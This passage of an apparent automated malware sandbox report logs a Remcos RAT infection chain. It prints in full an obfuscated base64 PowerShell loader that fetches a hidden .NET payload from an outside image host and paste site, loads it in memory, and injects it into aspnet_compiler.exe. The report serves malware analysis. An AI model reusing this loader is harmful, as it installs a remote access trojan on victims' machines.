                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $concessionaries = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHVubWF0ZXJuYWxseSA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9kenZhaTg2dWgvaW1hZ2UvdXBsb2FkL3YxNzM0MzE1MjQ0L20zZ3RicWt0dm5vY3l2bTQxMGFhLmpwZyc7JGJhZG1pbnRvbiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHJvYWRtYWtlciA9ICRiYWRtaW50b24uRG93bmxvYWREYXRhKCR1bm1hdGVybmFsbHkpOyRQaXNjZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcm9hZG1ha2VyKTskY2FwcmlmaWN1cyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskYmlydGhlcnMgPSAnPDxCQVNFNjRfRU5EPj4nOyRkaXNwb3NlZGx5ID0gJFBpc2Nlcy5JbmRleE9mKCRjYXByaWZpY3VzKTskcGljdHVyZSA9ICRQaXNjZXMuSW5kZXhPZigkYmlydGhlcnMpOyRkaXNwb3NlZGx5IC1nZSAwIC1hbmQgJHBpY3R1cmUgLWd0ICRkaXNwb3NlZGx5OyRkaXNwb3NlZGx5ICs9ICRjYXByaWZpY3VzLkxlbmd0aDskYmVlZnN0ZWFrID0gJHBpY3R1cmUgLSAkZGlzcG9zZWRseTskcmV0YXBpbmcgPSAkUGlzY2VzLlN1YnN0cmluZygkZGlzcG9zZWRseSwgJGJlZWZzdGVhayk7JGRpcmVjdGlvbnMgPSAtam9pbiAoJHJldGFwaW5nLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRyZXRhcGluZy5MZW5ndGgpXTskYmVpbGQgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRkaXJlY3Rpb25zKTskbG93ZXJjYXNlZCA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGJlaWxkKTskcm9vbWlseSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRyb29taWx5Lkludm9rZSgkbnVsbCwgQCgnMC9QWHJVSS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnbXVkd2VlZCcsICdtdWR3ZWVkJywgJ211ZHdlZWQnLCAnYXNwbmV0X2NvbXBpbGVyJywgJ211ZHdlZWQnLCdtdWR3ZWVkJywnbXVkd2VlZCcsJ2hhZW1hdGFjaG9tZXRlcicsICdDOlxQcm9ncmFtRGF0YVwnLCdoYWVtYXRhY2hvbWV0ZXInLCd2YnMnLCcxJywnMScsJ1Rhc2tOYW1lJykpO2lmICgkbnVsbCAtbmUgJFBTVmVyc2lvblRhYmxlIC1hbmQgJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiAtbmUgJG51bGwpIHsgW3ZvaWRdJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiB9IGVsc2UgeyBXcml0ZS1PdXRwdXQgJ1Bvd2VyU2hlbGwgdmVyc2lvbiBOb3QgYXZhaWxhYmxlJyB9O2lmICgkbnVsbCAtbmUgJFBTVmVyc2lvblRhYmxlIC1hbmQgJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiAtbmUgJG51bGwpIHsgW3ZvaWRdJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiB9IGVsc2UgeyBXcml0ZS1PdXRwdXQgJ1Bvd2VyU2hlbGwgdmVyc2lvbiBOb3QgYXZhaWxhYmxlJyB9Ow==';$neurologically = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($concessionaries));Invoke-Expression $neurologicallyJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\paqxrhksjzifkagvqwpv.vbs" Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $concessionaries = 'awygkcrudwxsic1uzsakufnwzxjzaw9uvgfibguglwfuzcakufnwzxjzaw9uvgfibguuufnwzxjzaw9uic1uzsakbnvsbckgeybbdm9pzf0kufnwzxjzaw9uvgfibguuufnwzxjzaw9uih0gzwxzzsb7ifdyaxrllu91dhb1dcanug93zxjtagvsbcb2zxjzaw9uie5vdcbhdmfpbgfibgunih07awygkcrudwxsic1uzsakufnwzxjzaw9uvgfibguglwfuzcakufnwzxjzaw9uvgfibguuufnwzxjzaw9uic1uzsakbnvsbckgeybbdm9pzf0kufnwzxjzaw9uvgfibguuufnwzxjzaw9uih0gzwxzzsb7ifdyaxrllu91dhb1dcanug93zxjtagvsbcb2zxjzaw9uie5vdcbhdmfpbgfibgunih07jhvubwf0zxjuywxsesa9icdodhrwczovl3jlcy5jbg91zgluyxj5lmnvbs9kenzhatg2dwgvaw1hz2uvdxbsb2fkl3yxnzm0mze1mjq0l20zz3ricwt0dm5vy3l2btqxmgfhlmpwzyc7jgjhzg1pbnrvbia9ie5ldy1pymply3qgu3lzdgvtlk5ldc5xzwjdbgllbnq7jhjvywrtywtlcia9icriywrtaw50b24urg93bmxvywreyxrhkcr1bm1hdgvybmfsbhkpoyrqaxnjzxmgpsbbu3lzdgvtllrlehqurw5jb2rpbmddojpvvey4lkdldfn0cmluzygkcm9hzg1ha2vyktsky2fwcmlmawn1cya9icc8pejbu0u2nf9tvefsvd4+jzskymlydghlcnmgpsanpdxcqvnfnjrfru5epj4noyrkaxnwb3nlzgx5id0gjfbpc2nlcy5jbmrlee9mkcrjyxbyawzpy3vzktskcgljdhvyzsa9icrqaxnjzxmusw5kzxhpzigkymlydghlcnmpoyrkaxnwb3nlzgx5ic1nzsawic1hbmqgjhbpy3r1cmuglwd0icrkaxnwb3nlzgx5oyrkaxnwb3nlzgx5ics9icrjyxbyawzpy3vzlkxlbmd0adskymvlznn0zwfrid0gjhbpy3r1cmuglsakzglzcg9zzwrsetskcmv0yxbpbmcgpsakuglzy2vzlln1ynn0cmluzygkzglzcg9zzwrseswgjgjlzwzzdgvhayk7jgrpcmvjdglvbnmgpsatam9pbiaojhjldgfwaw5nllrvq2hhckfycmf5kckgfcbgb3jfywnolu9iamvjdcb7icrfih0pwy0xli4tkcryzxrhcgluzy5mzw5ndggpxtskymvpbgqgpsbbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzty0u3ryaw5nkcrkaxjly3rpb25zktskbg93zxjjyxnlzca9ifttexn0zw0uumvmbgvjdglvbi5bc3nlbwjsev06okxvywqojgjlawxkktskcm9vbwlsesa9iftkbmxpyi5jty5ib21lxs5hzxrnzxrob2qoj1zbsscpoyryb29tawx5lkludm9rzsgkbnvsbcwgqcgnmc9qwhjvss9yl2vllmv0c2fwly86c3b0dggnlcanbxvkd2vlzccsicdtdwr3zwvkjywgj211zhdlzwqnlcanyxnwbmv0x2nvbxbpbgvyjywgj211zhdlzwqnlcdtdwr3zwvkjywnbxvkd2vlzccsj2hhzw1hdgfjag9tzxrlcicsicddolxqcm9ncmftrgf0yvwnlcdoywvtyxrhy2hvbwv0zxinlcd2ynmnlccxjywnmscsj1rhc2toyw1ljykpo2lmicgkbnvsbcatbmugjfbtvmvyc2lvblrhymxlic1hbmqgjfbtvmvyc2lvblrhymxlllbtvmvyc2lvbiatbmugjg51bgwpihsgw3zvawrdjfbtvmvyc2lvblrhymxlllbtvmvyc2lvbib9igvsc2ugeybxcml0zs1pdxrwdxqgj1bvd2vyu2hlbgwgdmvyc2lvbibob3qgyxzhawxhymxljyb9o2lmicgkbnvsbcatbmugjfbtvmvyc2lvblrhymxlic1hbmqgjfbtvmvyc2lvblrhymxlllbtvmvyc2lvbiatbmugjg51bgwpihsgw3zvawrdjfbtvmvyc2lvblrhymxlllbtvmvyc2lvbib9igvsc2ugeybxcml0zs1pdxrwdxqgj1bvd2vyu2hlbgwgdmvyc2lvbibob3qgyxzhawxhymxljyb9ow==';$neurologically = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($concessionaries));invoke-expression $neurologically
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $concessionaries = 'awygkcrudwxsic1uzsakufnwzxjzaw9uvgfibguglwfuzcakufnwzxjzaw9uvgfibguuufnwzxjzaw9uic1uzsakbnvsbckgeybbdm9pzf0kufnwzxjzaw9uvgfibguuufnwzxjzaw9uih0gzwxzzsb7ifdyaxrllu91dhb1dcanug93zxjtagvsbcb2zxjzaw9uie5vdcbhdmfpbgfibgunih07awygkcrudwxsic1uzsakufnwzxjzaw9uvgfibguglwfuzcakufnwzxjzaw9uvgfibguuufnwzxjzaw9uic1uzsakbnvsbckgeybbdm9pzf0kufnwzxjzaw9uvgfibguuufnwzxjzaw9uih0gzwxzzsb7ifdyaxrllu91dhb1dcanug93zxjtagvsbcb2zxjzaw9uie5vdcbhdmfpbgfibgunih07jhvubwf0zxjuywxsesa9icdodhrwczovl3jlcy5jbg91zgluyxj5lmnvbs9kenzhatg2dwgvaw1hz2uvdxbsb2fkl3yxnzm0mze1mjq0l20zz3ricwt0dm5vy3l2btqxmgfhlmpwzyc7jgjhzg1pbnrvbia9ie5ldy1pymply3qgu3lzdgvtlk5ldc5xzwjdbgllbnq7jhjvywrtywtlcia9icriywrtaw50b24urg93bmxvywreyxrhkcr1bm1hdgvybmfsbhkpoyrqaxnjzxmgpsbbu3lzdgvtllrlehqurw5jb2rpbmddojpvvey4lkdldfn0cmluzygkcm9hzg1ha2vyktsky2fwcmlmawn1cya9icc8pejbu0u2nf9tvefsvd4+jzskymlydghlcnmgpsanpdxcqvnfnjrfru5epj4noyrkaxnwb3nlzgx5id0gjfbpc2nlcy5jbmrlee9mkcrjyxbyawzpy3vzktskcgljdhvyzsa9icrqaxnjzxmusw5kzxhpzigkymlydghlcnmpoyrkaxnwb3nlzgx5ic1nzsawic1hbmqgjhbpy3r1cmuglwd0icrkaxnwb3nlzgx5oyrkaxnwb3nlzgx5ics9icrjyxbyawzpy3vzlkxlbmd0adskymvlznn0zwfrid0gjhbpy3r1cmuglsakzglzcg9zzwrsetskcmv0yxbpbmcgpsakuglzy2vzlln1ynn0cmluzygkzglzcg9zzwrseswgjgjlzwzzdgvhayk7jgrpcmvjdglvbnmgpsatam9pbiaojhjldgfwaw5nllrvq2hhckfycmf5kckgfcbgb3jfywnolu9iamvjdcb7icrfih0pwy0xli4tkcryzxrhcgluzy5mzw5ndggpxtskymvpbgqgpsbbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzty0u3ryaw5nkcrkaxjly3rpb25zktskbg93zxjjyxnlzca9ifttexn0zw0uumvmbgvjdglvbi5bc3nlbwjsev06okxvywqojgjlawxkktskcm9vbwlsesa9iftkbmxpyi5jty5ib21lxs5hzxrnzxrob2qoj1zbsscpoyryb29tawx5lkludm9rzsgkbnvsbcwgqcgnmc9qwhjvss9yl2vllmv0c2fwly86c3b0dggnlcanbxvkd2vlzccsicdtdwr3zwvkjywgj211zhdlzwqnlcanyxnwbmv0x2nvbxbpbgvyjywgj211zhdlzwqnlcdtdwr3zwvkjywnbxvkd2vlzccsj2hhzw1hdgfjag9tzxrlcicsicddolxqcm9ncmftrgf0yvwnlcdoywvtyxrhy2hvbwv0zxinlcd2ynmnlccxjywnmscsj1rhc2toyw1ljykpo2lmicgkbnvsbcatbmugjfbtvmvyc2lvblrhymxlic1hbmqgjfbtvmvyc2lvblrhymxlllbtvmvyc2lvbiatbmugjg51bgwpihsgw3zvawrdjfbtvmvyc2lvblrhymxlllbtvmvyc2lvbib9igvsc2ugeybxcml0zs1pdxrwdxqgj1bvd2vyu2hlbgwgdmvyc2lvbibob3qgyxzhawxhymxljyb9o2lmicgkbnvsbcatbmugjfbtvmvyc2lvblrhymxlic1hbmqgjfbtvmvyc2lvblrhymxlllbtvmvyc2lvbiatbmugjg51bgwpihsgw3zvawrdjfbtvmvyc2lvblrhymxlllbtvmvyc2lvbib9igvsc2ugeybxcml0zs1pdxrwdxqgj1bvd2vyu2hlbgwgdmvyc2lvbibob3qgyxzhawxhymxljyb9ow==';$neurologically = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($concessionaries));invoke-expression $neurologically
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $concessionaries = 'awygkcrudwxsic1uzsakufnwzxjzaw9uvgfibguglwfuzcakufnwzxjzaw9uvgfibguuufnwzxjzaw9uic1uzsakbnvsbckgeybbdm9pzf0kufnwzxjzaw9uvgfibguuufnwzxjzaw9uih0gzwxzzsb7ifdyaxrllu91dhb1dcanug93zxjtagvsbcb2zxjzaw9uie5vdcbhdmfpbgfibgunih07awygkcrudwxsic1uzsakufnwzxjzaw9uvgfibguglwfuzcakufnwzxjzaw9uvgfibguuufnwzxjzaw9uic1uzsakbnvsbckgeybbdm9pzf0kufnwzxjzaw9uvgfibguuufnwzxjzaw9uih0gzwxzzsb7ifdyaxrllu91dhb1dcanug93zxjtagvsbcb2zxjzaw9uie5vdcbhdmfpbgfibgunih07jhvubwf0zxjuywxsesa9icdodhrwczovl3jlcy5jbg91zgluyxj5lmnvbs9kenzhatg2dwgvaw1hz2uvdxbsb2fkl3yxnzm0mze1mjq0l20zz3ricwt0dm5vy3l2btqxmgfhlmpwzyc7jgjhzg1pbnrvbia9ie5ldy1pymply3qgu3lzdgvtlk5ldc5xzwjdbgllbnq7jhjvywrtywtlcia9icriywrtaw50b24urg93bmxvywreyxrhkcr1bm1hdgvybmfsbhkpoyrqaxnjzxmgpsbbu3lzdgvtllrlehqurw5jb2rpbmddojpvvey4lkdldfn0cmluzygkcm9hzg1ha2vyktsky2fwcmlmawn1cya9icc8pejbu0u2nf9tvefsvd4+jzskymlydghlcnmgpsanpdxcqvnfnjrfru5epj4noyrkaxnwb3nlzgx5id0gjfbpc2nlcy5jbmrlee9mkcrjyxbyawzpy3vzktskcgljdhvyzsa9icrqaxnjzxmusw5kzxhpzigkymlydghlcnmpoyrkaxnwb3nlzgx5ic1nzsawic1hbmqgjhbpy3r1cmuglwd0icrkaxnwb3nlzgx5oyrkaxnwb3nlzgx5ics9icrjyxbyawzpy3vzlkxlbmd0adskymvlznn0zwfrid0gjhbpy3r1cmuglsakzglzcg9zzwrsetskcmv0yxbpbmcgpsakuglzy2vzlln1ynn0cmluzygkzglzcg9zzwrseswgjgjlzwzzdgvhayk7jgrpcmvjdglvbnmgpsatam9pbiaojhjldgfwaw5nllrvq2hhckfycmf5kckgfcbgb3jfywnolu9iamvjdcb7icrfih0pwy0xli4tkcryzxrhcgluzy5mzw5ndggpxtskymvpbgqgpsbbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzty0u3ryaw5nkcrkaxjly3rpb25zktskbg93zxjjyxnlzca9ifttexn0zw0uumvmbgvjdglvbi5bc3nlbwjsev06okxvywqojgjlawxkktskcm9vbwlsesa9iftkbmxpyi5jty5ib21lxs5hzxrnzxrob2qoj1zbsscpoyryb29tawx5lkludm9rzsgkbnvsbcwgqcgnmc9qwhjvss9yl2vllmv0c2fwly86c3b0dggnlcanbxvkd2vlzccsicdtdwr3zwvkjywgj211zhdlzwqnlcanyxnwbmv0x2nvbxbpbgvyjywgj211zhdlzwqnlcdtdwr3zwvkjywnbxvkd2vlzccsj2hhzw1hdgfjag9tzxrlcicsicddolxqcm9ncmftrgf0yvwnlcdoywvtyxrhy2hvbwv0zxinlcd2ynmnlccxjywnmscsj1rhc2toyw1ljykpo2lmicgkbnvsbcatbmugjfbtvmvyc2lvblrhymxlic1hbmqgjfbtvmvyc2lvblrhymxlllbtvmvyc2lvbiatbmugjg51bgwpihsgw3zvawrdjfbtvmvyc2lvblrhymxlllbtvmvyc2lvbib9igvsc2ugeybxcml0zs1pdxrwdxqgj1bvd2vyu2hlbgwgdmvyc2lvbibob3qgyxzhawxhymxljyb9o2lmicgkbnvsbcatbmugjfbtvmvyc2lvblrhymxlic1hbmqgjfbtvmvyc2lvblrhymxlllbtvmvyc2lvbiatbmugjg51bgwpihsgw3zvawrdjfbtvmvyc2lvblrhymxlllbtvmvyc2lvbib9igvsc2ugeybxcml0zs1pdxrwdxqgj1bvd2vyu2hlbgwgdmvyc2lvbibob3qgyxzhawxhymxljyb9ow==';$neurologically = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($concessionaries));invoke-expression $neurologicallyJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $concessionaries = 'awygkcrudwxsic1uzsakufnwzxjzaw9uvgfibguglwfuzcakufnwzxjzaw9uvgfibguuufnwzxjzaw9uic1uzsakbnvsbckgeybbdm9pzf0kufnwzxjzaw9uvgfibguuufnwzxjzaw9uih0gzwxzzsb7ifdyaxrllu91dhb1dcanug93zxjtagvsbcb2zxjzaw9uie5vdcbhdmfpbgfibgunih07awygkcrudwxsic1uzsakufnwzxjzaw9uvgfibguglwfuzcakufnwzxjzaw9uvgfibguuufnwzxjzaw9uic1uzsakbnvsbckgeybbdm9pzf0kufnwzxjzaw9uvgfibguuufnwzxjzaw9uih0gzwxzzsb7ifdyaxrllu91dhb1dcanug93zxjtagvsbcb2zxjzaw9uie5vdcbhdmfpbgfibgunih07jhvubwf0zxjuywxsesa9icdodhrwczovl3jlcy5jbg91zgluyxj5lmnvbs9kenzhatg2dwgvaw1hz2uvdxbsb2fkl3yxnzm0mze1mjq0l20zz3ricwt0dm5vy3l2btqxmgfhlmpwzyc7jgjhzg1pbnrvbia9ie5ldy1pymply3qgu3lzdgvtlk5ldc5xzwjdbgllbnq7jhjvywrtywtlcia9icriywrtaw50b24urg93bmxvywreyxrhkcr1bm1hdgvybmfsbhkpoyrqaxnjzxmgpsbbu3lzdgvtllrlehqurw5jb2rpbmddojpvvey4lkdldfn0cmluzygkcm9hzg1ha2vyktsky2fwcmlmawn1cya9icc8pejbu0u2nf9tvefsvd4+jzskymlydghlcnmgpsanpdxcqvnfnjrfru5epj4noyrkaxnwb3nlzgx5id0gjfbpc2nlcy5jbmrlee9mkcrjyxbyawzpy3vzktskcgljdhvyzsa9icrqaxnjzxmusw5kzxhpzigkymlydghlcnmpoyrkaxnwb3nlzgx5ic1nzsawic1hbmqgjhbpy3r1cmuglwd0icrkaxnwb3nlzgx5oyrkaxnwb3nlzgx5ics9icrjyxbyawzpy3vzlkxlbmd0adskymvlznn0zwfrid0gjhbpy3r1cmuglsakzglzcg9zzwrsetskcmv0yxbpbmcgpsakuglzy2vzlln1ynn0cmluzygkzglzcg9zzwrseswgjgjlzwzzdgvhayk7jgrpcmvjdglvbnmgpsatam9pbiaojhjldgfwaw5nllrvq2hhckfycmf5kckgfcbgb3jfywnolu9iamvjdcb7icrfih0pwy0xli4tkcryzxrhcgluzy5mzw5ndggpxtskymvpbgqgpsbbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzty0u3ryaw5nkcrkaxjly3rpb25zktskbg93zxjjyxnlzca9ifttexn0zw0uumvmbgvjdglvbi5bc3nlbwjsev06okxvywqojgjlawxkktskcm9vbwlsesa9iftkbmxpyi5jty5ib21lxs5hzxrnzxrob2qoj1zbsscpoyryb29tawx5lkludm9rzsgkbnvsbcwgqcgnmc9qwhjvss9yl2vllmv0c2fwly86c3b0dggnlcanbxvkd2vlzccsicdtdwr3zwvkjywgj211zhdlzwqnlcanyxnwbmv0x2nvbxbpbgvyjywgj211zhdlzwqnlcdtdwr3zwvkjywnbxvkd2vlzccsj2hhzw1hdgfjag9tzxrlcicsicddolxqcm9ncmftrgf0yvwnlcdoywvtyxrhy2hvbwv0zxinlcd2ynmnlccxjywnmscsj1rhc2toyw1ljykpo2lmicgkbnvsbcatbmugjfbtvmvyc2lvblrhymxlic1hbmqgjfbtvmvyc2lvblrhymxlllbtvmvyc2lvbiatbmugjg51bgwpihsgw3zvawrdjfbtvmvyc2lvblrhymxlllbtvmvyc2lvbib9igvsc2ugeybxcml0zs1pdxrwdxqgj1bvd2vyu2hlbgwgdmvyc2lvbibob3qgyxzhawxhymxljyb9o2lmicgkbnvsbcatbmugjfbtvmvyc2lvblrhymxlic1hbmqgjfbtvmvyc2lvblrhymxlllbtvmvyc2lvbiatbmugjg51bgwpihsgw3zvawrdjfbtvmvyc2lvblrhymxlllbtvmvyc2lvbib9igvsc2ugeybxcml0zs1pdxrwdxqgj1bvd2vyu2hlbgwgdmvyc2lvbibob3qgyxzhawxhymxljyb9ow==';$neurologically = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($concessionaries));invoke-expression $neurologicallyJump to behavior
                        Source: aspnet_compiler.exe, 0000000F.00000002.2892055901.0000000000FB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                        Source: aspnet_compiler.exe, 0000000F.00000002.2892055901.0000000000FB8000.00000004.00000020.00020000.00000000.sdmp, logs.dat.15.drBinary or memory string: [Program Manager]
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_00433E0A cpuid 21_2_00433E0A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: EnumSystemLocalesW,21_2_004470AE
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: GetLocaleInfoW,21_2_004510BA
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,21_2_004511E3
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: GetLocaleInfoW,21_2_004512EA
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,21_2_004513B7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: GetLocaleInfoW,21_2_00447597
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: GetLocaleInfoA,21_2_0040E679
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,21_2_00450A7F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: EnumSystemLocalesW,21_2_00450CF7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: EnumSystemLocalesW,21_2_00450D42
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: EnumSystemLocalesW,21_2_00450DDD
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,21_2_00450E6A
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_00434010 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,21_2_00434010
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_0041A7A2 GetUserNameW,21_2_0041A7A2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_0044800F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,21_2_0044800F
                        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Stealing of Sensitive Information

                        barindex
                        Yara detected Remcos RAT
